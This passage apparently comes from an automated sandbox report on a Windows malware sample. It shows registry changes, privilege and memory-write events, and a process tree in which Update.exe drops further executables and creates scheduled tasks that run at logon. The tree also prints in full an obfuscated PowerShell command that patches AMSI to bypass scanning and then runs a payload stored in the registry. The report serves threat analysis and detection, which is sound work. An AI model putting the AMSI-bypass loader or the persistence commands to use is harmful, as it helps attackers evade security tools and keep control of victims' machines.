000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133567065728993929" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Cortana_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 3520 powershell.EXE 3520 powershell.EXE 3520 powershell.EXE 3520 powershell.EXE 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe 4184 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
Update.exeBiosUpdX64.exepowershell.EXEdllhost.exeexplorer.exesvchost.exesvchost.exeRuntimeBroker.exeWerFault.exedescription pid process Token: SeDebugPrivilege 4924 Update.exe Token: SeDebugPrivilege 508 BiosUpdX64.exe Token: SeDebugPrivilege 3520 powershell.EXE Token: SeDebugPrivilege 3520 powershell.EXE Token: SeDebugPrivilege 4184 dllhost.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeAuditPrivilege 2492 svchost.exe Token: SeAuditPrivilege 2492 svchost.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeAuditPrivilege 1900 svchost.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeTakeOwnershipPrivilege 3932 RuntimeBroker.exe Token: SeRestorePrivilege 3932 RuntimeBroker.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeShutdownPrivilege 4484 explorer.exe Token: SeCreatePagefilePrivilege 4484 explorer.exe Token: SeDebugPrivilege 3912 WerFault.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
Processes:
dwm.exeexplorer.exepid process 1004 dwm.exe 1004 dwm.exe 1004 dwm.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 1004 dwm.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
explorer.exepid process 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe 4484 explorer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
BiosUpdX64.exeSearchUI.exepid process 508 BiosUpdX64.exe 1388 SearchUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Update.exeBiosUpdX64.exepowershell.EXEdllhost.exedescription pid process target process PID 4924 wrote to memory of 4592 4924 Update.exe schtasks.exe PID 4924 wrote to memory of 4592 4924 Update.exe schtasks.exe PID 4924 wrote to memory of 4592 4924 Update.exe schtasks.exe PID 4924 wrote to memory of 508 4924 Update.exe BiosUpdX64.exe PID 4924 wrote to memory of 508 4924 Update.exe BiosUpdX64.exe PID 4924 wrote to memory of 508 4924 Update.exe BiosUpdX64.exe PID 508 wrote to memory of 4356 508 BiosUpdX64.exe schtasks.exe PID 508 wrote to memory of 4356 508 BiosUpdX64.exe schtasks.exe PID 508 wrote to memory of 4356 508 BiosUpdX64.exe schtasks.exe PID 4924 wrote to memory of 4972 4924 Update.exe Install.exe PID 4924 wrote to memory of 4972 4924 Update.exe Install.exe PID 4924 wrote to memory of 4972 4924 Update.exe Install.exe PID 4924 wrote to memory of 4440 4924 Update.exe SCHTASKS.exe PID 4924 wrote to memory of 4440 4924 Update.exe SCHTASKS.exe PID 4924 wrote to memory of 4440 4924 Update.exe SCHTASKS.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 3520 wrote to memory of 4184 3520 powershell.EXE dllhost.exe PID 4184 wrote to memory of 584 4184 dllhost.exe winlogon.exe PID 4184 wrote to memory of 636 4184 dllhost.exe lsass.exe PID 4184 wrote to memory of 728 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 908 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1004 4184 dllhost.exe dwm.exe PID 4184 wrote to memory of 64 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 304 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 380 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1040 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1080 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1100 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1172 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1220 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1304 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1324 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1336 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1416 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1472 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1540 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1564 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1584 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1664 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1680 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1796 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1804 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1868 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1904 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 1536 4184 dllhost.exe spoolsv.exe PID 4184 wrote to memory of 1900 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2060 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2364 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2492 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2536 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2544 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2588 4184 dllhost.exe sihost.exe PID 4184 wrote to memory of 2632 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2708 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2716 4184 dllhost.exe sysmon.exe PID 4184 wrote to memory of 2756 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2780 4184 dllhost.exe svchost.exe PID 4184 wrote to memory of 2792 4184 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c4825f8a-cddd-4e55-8809-643ba0d3e78f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rbyPMSWWDIYz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqJpnjjIwXKtAf,[Parameter(Position=1)][Type]$ReVZDpTDnf)$PzVqUndelcQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+'d,'+'A'+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$PzVqUndelcQ.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+'lN'+'a'+''+'m'+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');$PzVqUndelcQ.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+','+'Hi'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+'t'+'ual',$ReVZDpTDnf,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+'e'+','+'M'+'an'+'a'+'ge'+'d'+'');Write-Output $PzVqUndelcQ.CreateType();}$qjTqAYujRxgjR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'M'+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+''+'s'+'');$CJLPhZTmIbjzLx=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'ess',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+''+'i'+'c,St'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WOubvlbaoyDLNBMGOEB=rbyPMSWWDIYz @([String])([IntPtr]);$eMineYwiamzfsVmmqfvimZ=rbyPMSWWDIYz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BQTFqxkcBbb=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$IbdxMrWcCMgfQM=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+'b'+'ra'+[Char](114)+'y'+'A'+'')));$zBsXyuCcLGUTMdeQZ=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$AjgUtzZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbdxMrWcCMgfQM,$WOubvlbaoyDLNBMGOEB).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+'l'+''+'l'+'');$SpfalLkETqXGVwIEc=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$AjgUtzZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$phomDeRzDu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,4,[ref]$phomDeRzDu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SpfalLkETqXGVwIEc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,0x20,[ref]$phomDeRzDu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'W'+[Char](65)+''+'R'+'E').GetValue('$'+'7'+''+[Char](55)+''+'s'+'t'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3360 -s 71802⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3684 -s 9642⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
